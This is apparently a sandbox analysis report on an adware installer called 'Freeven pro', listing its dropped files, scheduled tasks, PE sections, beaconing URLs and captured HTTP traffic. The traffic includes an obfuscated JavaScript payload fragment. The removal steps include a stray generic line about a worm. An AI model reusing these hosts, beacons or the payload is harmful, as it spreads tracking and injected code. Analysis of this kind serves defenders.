%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\141988 (195663 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\64.js (2 bytes)
%Program Files%\Freeven pro\utils.exe (68126 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-2.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\46.js (2 bytes)
%Program Files%\Freeven pro\54248.crx (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\13.js (6 bytes)
%Program Files%\Freeven pro\Freeven pro-codedownloader.exe (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\223.js (453 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-4.exe (5873 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\38.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\22.js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\42.js (6 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-3.job (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\246.js (2 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-3.exe (13122 bytes)
%Program Files%\Freeven pro\Uninstall.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\39.js (4 bytes)
%Program Files%\Freeven pro\360-54248.crx (1425 bytes)
%Program Files%\Freeven pro\875f2efa-2a31-4c0f-be39-9293cb48929c-5.exe (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\21.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\40.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\91.js (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\242.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\177.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\4.js (3312 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-2.job (70 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-1.job (70 bytes)
%Program Files%\Freeven pro\54248.xpi (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\207.js (1 bytes)
%WinDir%\Tasks\temp_875f2efa-2a31-4c0f-be39-9293cb48929c-2.job (138 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\43.js (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\191.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\78.js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\2.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins.json (12 bytes)
%WinDir%\Tasks\875f2efa-2a31-4c0f-be39-9293cb48929c-5.job (70 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\36.js (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\184.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\37.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\45.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\41.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\103.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\35.js (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\244.js (501 bytes)
%Program Files%\Freeven pro\Freeven pro.ico (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\3.js (63 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\InstallerUtils.dll (25776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\183.js (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\462018 (741774 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\17.js (2392 bytes)
%Program Files%\Freeven pro\Freeven pro-bho.dll (3073 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsx5.tmp (288023 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\102.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\extensionData\plugins\94.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn6.tmp\update.json (39 bytes)
%WinDir%\system.ini (72 bytes)
%Program Files%\Adobe\Reader 9.0\Reader\READER_SL.EXE (432 bytes)
%Program Files%\Common Files\Java\Java Update\jusched.exe (856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\Jdwqkklr.tmp (217971 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\Qvalysaly.exe (861462 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\WrapperUtils.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\rmlukm.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss2.tmp (232535 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\00125F9D_Rar\%original file name%.exe (53142 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsn3.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\220[1].js (19033 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\273[1].js (903 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\plugins[1].json (4153 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\375[1].js (679 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\195[1].js (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\set_campaign_id_m[1].js (508 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\manifest[1].xml (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\102[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\380[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\200[1].js (807 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\9[1].js (73 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\233[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\184[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\7[1].js (683 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\391[1].js (795 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\193[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\jquery-1_7_1_min[1].js (44457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\246[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\253[1].js (735 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\354[1].js (60025 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\242[1].js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\334[1].js (967 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\376[1].js (1417 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\223[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\288[1].js (963 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\app_code[1].js (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\180[1].js (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\42[1].js (769 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OHYRGXIJ\281[1].js (455 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\390[1].js (823 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\91[1].js (87921 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OX6J4PMZ\230[1].js (867 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\221[1].js (413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\05I7KPMB\345[1].js (645 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\89AJKDYV\260[1].js (823 bytes) - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name: Tgeslexscrg
Product Name: Nwbgt
Product Version:
Legal Copyright: Axcqtl
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 23.25.18.22
File Description: Pfusuetjjzgt
Comments:
Language: English (United States)
Company Name: TgeslexscrgProduct Name: NwbgtProduct Version: Legal Copyright: AxcqtlLegal Trademarks: Original Filename: Internal Name: File Version: 23.25.18.22File Description: PfusuetjjzgtComments: Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 34880 | 35328 | 4.15051 | bb4ba76c16dfeef0912cc68f9edb1285 |
| .data | 40960 | 140 | 512 | 0.818128 | a5a710a52d844b19513b2cab5693dbc3 |
| .rdata | 45056 | 9108 | 9216 | 4.0908 | 004265d16597098398ce8e06897dcd29 |
| .bss | 57344 | 252880 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .idata | 311296 | 4868 | 5120 | 3.64756 | 20f692042b54593897a705a64d67ce50 |
| .ndata | 319488 | 286720 | 8192 | 0 | 0829f71740aab1ab98b33eae21dee122 |
| .rsrc | 606208 | 17184 | 17408 | 4.12231 | a7421e5fac485204160f3e6381e28702 |
| .odata | 626688 | 77824 | 77824 | 5.54121 | 708eea8efbddd2beddadb0a08e9db490 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://cds.d5k9g9i8.hwcdn.net/installer_updates/001360/update.json | |
| hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_04&bic=11992E1999324ACFB8E0C19B718E3265IE&app=54248&appver=0&verifier=283fbbb93af62851d4ee04659eadac21&srcid=001360&version_date=07-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_22&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&procstarttime=1427668122&procruntime=6&rnd=1427668128 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/monetization.gif?event=3&ibic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&campaign=001360&app=54248&bhover=1_34_05_04&xpiver=0_94&crxver=1_26_22&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1427668122&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&browser=ie,de | |
| hxxp://s3-website-us-east-1.amazonaws.com/stats.gif?action=daily&app=54248&bic=11992E1999324ACFB8E0C19B718E3265IE&ibic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&ver=1_34_05_04&installtime=1427668122&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001360&campaign=001360&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=22&bgver=1&pluginsver=17&curtime=1427668122&lifetime=0&rnd=6720 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/54248/manifest/1_34_05_04/ie6/manifest.xml?ver=22&rnd=677 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/54248/js/na/ie/app_code.js?ver=111&rnd=2816 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugin/apps/54248/plugins/na/ie/plugins.json?ver=103&rnd=9831 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/42.js?ver=10&rnd=41 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/391.js?ver=1&rnd=41 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/375.js?ver=1&rnd=41 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/390.js?ver=1&rnd=41 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/380.js?ver=1&rnd=41 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/281.js?ver=3&rnd=41 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/334.js?ver=1&rnd=41 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/273.js?ver=6&rnd=41 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/260.js?ver=4&rnd=41 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/288.js?ver=4&rnd=41 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/242.js?ver=4&rnd=8467 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/230.js?ver=7&rnd=8467 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/233.js?ver=7&rnd=8467 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/javascripts/monetization/geo/set_campaign_id_m.js?ver=5&rnd=8467 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/223.js?ver=9&rnd=8467 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/221.js?ver=4&rnd=8467 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/200.js?ver=4&rnd=8467 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/195.js?ver=28&rnd=8467 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/220.js?ver=38&rnd=8467 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/7.js?ver=2&rnd=6334 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/9.js?ver=3&rnd=8467 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/193.js?ver=9&rnd=6334 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/184.js?ver=11&rnd=6334 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/180.js?ver=12&rnd=6334 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/102.js?ver=15&rnd=6334 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/91.js?ver=135&rnd=6334 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/376.js?ver=3&rnd=6334 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/354.js?ver=2&rnd=6334 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/345.js?ver=13&rnd=6334 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/253.js?ver=2&rnd=6500 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/mins/246.js?ver=17&rnd=6334 | |
| hxxp://cds.d5k9g9i8.hwcdn.net/plugins/javascripts/jquery-1_7_1_min.js?ver=5&rnd=6500 | |
| hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=update&app=54248&bic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&ver=1_34_05_04&installtime=1427668122&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001360&subid=0&zdata=0&appver=111&bgver=1&pluginsver=103&curtime=1427668154&lifetime=32&oldappver=22&oldbgver=1&oldpluginsver=17&rnd=270 | |
| hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_04&bic=11992E1999324ACFB8E0C19B718E3265IE&app=54248&appver=111&verifier=283fbbb93af62851d4ee04659eadac21&srcid=001360&version_date=07-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_22&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1427668122&procruntime=41&rnd=1427668163 | |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/242.js?ver=4&rnd=8467 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/260.js?ver=4&rnd=41 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/200.js?ver=4&rnd=8467 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/375.js?ver=1&rnd=41 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/246.js?ver=17&rnd=6334 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/334.js?ver=1&rnd=41 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugin/apps/54248/plugins/na/ie/plugins.json?ver=103&rnd=9831 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/42.js?ver=10&rnd=41 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/220.js?ver=38&rnd=8467 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/195.js?ver=28&rnd=8467 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/javascripts/jquery-1_7_1_min.js?ver=5&rnd=6500 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/354.js?ver=2&rnd=6334 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/391.js?ver=1&rnd=41 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/376.js?ver=3&rnd=6334 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/184.js?ver=11&rnd=6334 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/281.js?ver=3&rnd=41 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/180.js?ver=12&rnd=6334 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/javascripts/monetization/geo/set_campaign_id_m.js?ver=5&rnd=8467 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/390.js?ver=1&rnd=41 | 69.16.175.10 |
| hxxp://stats.clientstaticserv.com/installer.gif?action=started&browser=ie&browserver=6&ver=1_34_05_04&bic=11992E1999324ACFB8E0C19B718E3265IE&app=54248&appver=0&verifier=283fbbb93af62851d4ee04659eadac21&srcid=001360&version_date=07-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_22&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&procstarttime=1427668122&procruntime=6&rnd=1427668128 | 54.231.2.124 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/273.js?ver=6&rnd=41 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/9.js?ver=3&rnd=8467 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/193.js?ver=9&rnd=6334 | 69.16.175.10 |
| hxxp://update.clientstaticserv.com/installer_updates/001360/update.json | 69.16.175.42 |
| hxxp://js.ourstatsstaticstack.com/plugin/apps/54248/js/na/ie/app_code.js?ver=111&rnd=2816 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/7.js?ver=2&rnd=6334 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/223.js?ver=9&rnd=8467 | 69.16.175.10 |
| hxxp://stats.clientstaticserv.com/stats.gif?action=daily&app=54248&bic=11992E1999324ACFB8E0C19B718E3265IE&ibic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&ver=1_34_05_04&installtime=1427668122&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001360&campaign=001360&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=22&bgver=1&pluginsver=17&curtime=1427668122&lifetime=0&rnd=6720 | 54.231.2.124 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/221.js?ver=4&rnd=8467 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/380.js?ver=1&rnd=41 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/91.js?ver=135&rnd=6334 | 69.16.175.10 |
| hxxp://stats.clientstaticserv.com/installer.gif?action=finished&browser=ie&browserver=6&ver=1_34_05_04&bic=11992E1999324ACFB8E0C19B718E3265IE&app=54248&appver=111&verifier=283fbbb93af62851d4ee04659eadac21&srcid=001360&version_date=07-05-14&subid=0&zdata=0&xpiver=0_94&crxver=1_26_22&default=ie&chver=na&ffver=na&iever=6&silent=1&os=XP32&admin=1&type=17179881473&asw=0&asw2=8704&ieprofiles=1&chprofiles=na&ffprofiles=na&procstarttime=1427668122&procruntime=41&rnd=1427668163 | 54.231.2.124 |
| hxxp://stats.clientstaticserv.com/apps.gif?action=update&app=54248&bic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&ver=1_34_05_04&installtime=1427668122&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001360&subid=0&zdata=0&appver=111&bgver=1&pluginsver=103&curtime=1427668154&lifetime=32&oldappver=22&oldbgver=1&oldpluginsver=17&rnd=270 | 54.231.2.124 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/345.js?ver=13&rnd=6334 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/288.js?ver=4&rnd=41 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/230.js?ver=7&rnd=8467 | 69.16.175.10 |
| hxxp://js.clientstaticserv.com/plugin/apps/54248/manifest/1_34_05_04/ie6/manifest.xml?ver=22&rnd=677 | 69.16.175.10 |
| hxxp://logs.clientstaticserv.com/monetization.gif?event=3&ibic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&campaign=001360&app=54248&bhover=1_34_05_04&xpiver=0_94&crxver=1_26_22&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1427668122&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&browser=ie,de | 69.16.175.42 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/253.js?ver=2&rnd=6500 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/102.js?ver=15&rnd=6334 | 69.16.175.10 |
| hxxp://js.ourstatsstaticstack.com/plugins/mins/233.js?ver=7&rnd=8467 | 69.16.175.10 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /monetization.gif?event=3&ibic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&campaign=001360&app=54248&bhover=1_34_05_04&xpiver=0_94&crxver=1_26_22&os=XP32&defbro=ie&chver=na&ffver=na&iever=6&starttime=1427668122&asw=00000000000000000000000000000000&asw2=00000000000000000010001000000000&browser=ie,de HTTP/1.1
Host: logs.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:28:49 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1427668129.dop004.fr7.t,1427668129.cds021.fr7.c
GIF89a.............,...........D..;..
GET /stats.gif?action=daily&app=54248&bic=11992E1999324ACFB8E0C19B718E3265IE&ibic=11992E1999324ACFB8E0C19B718E3265IE&verifier=283fbbb93af62851d4ee04659eadac21&ver=1_34_05_04&installtime=1427668122&os=XP32&browser=ie&browserver=6&ffver=X&chromever=X&srcid=001360&campaign=001360&subid=default_subid&zdata=default_zdata&ieprofiles=1&chprofiles=0&ffprofiles=0&runfrom=installer&appver=22&bgver=1&pluginsver=17&curtime=1427668122&lifetime=0&rnd=6720 HTTP/1.1
Accept: */*
Host: stats.clientstaticserv.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
x-amz-id-2: bv7R7GvoHtkT6tZwDHTn5aGvv82bpoRuZfuwoQE7Y9eihDblVFiDgrF6TjNV4bMySYPxeldlZck=
x-amz-request-id: A00E4ABD3823A6B0
Date: Sun, 29 Mar 2015 22:29:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Mon, 24 Feb 2014 23:56:43 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;..
GET /plugins/mins/375.js?ver=1&rnd=41 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Host: js.ourstatsstaticstack.com
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Sun, 29 Mar 2015 22:29:12 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1423049332"
Last-Modified: Wed, 04 Feb 2015 11:28:52 GMT
Cache-Control: max-age=900
Content-Length: 679
Content-Type: application/x-javascript; charset=UTF-8
X-HW: 1427668152.dop003.fr7.t,1427668152.cds023.fr7.c
if (typeof setup2 === 'function') { setup2('MDE3MDc4NDMwMzFlMDUxMzJmMWMxNjU4NGI0MTQ5MDIwNTE3MGE1NDU1NTUxODRmMDgxODE0MDExMDFkNTQxMzFmMDcwNDQ1MTIxMTFmMGM1NTEwMTAxNzBhMTkxMjExMTMxZTBlNTQxYjEyNTQwOTE5MDIxNDAwMWYxNjRjMDIxOTBlMDMzYzI1MzEzOTI4M2UzMjM4MzgzODI3M2YzYzI1M2YyOTM1MmUyNDM1MjYzZTMxMjkyZjMzM2UyMjJlMmUzYzU4NDI3MDczNTMwOTFmMWUwMTEwMmYxYzE2NTg0YjQxNDkwMjA1MTcwYTFkNDA1NTVlMDgzNDA5MDMwNjE4MDQwOTI1MTgwZjBkMDU1ZjE3MTYxZDE5MWUxZjRmMDgwNTFjNGMxOTFjMWYxODVlMGIwYTFjMTAxMDE5MWMxMzBhMDU0ZjAxMTk0ZTAwMTIwZjE0MTQxNDBkNTYwOTAzMDcwODMxMjUyNTMyMzMyNDM5MjIzMTMzMmEzZjI4MmUyNDMzM2UzNDJkM2UyYjNlMjUyMjM0MjkzNTM4MjcyNTMxNTg1NjdiNjg0OTFhMWQxNjFkMDcxNDMzMTU0MzUxNGE0MjU0NGY2NDA3', 'zzqakjqczn'); }....
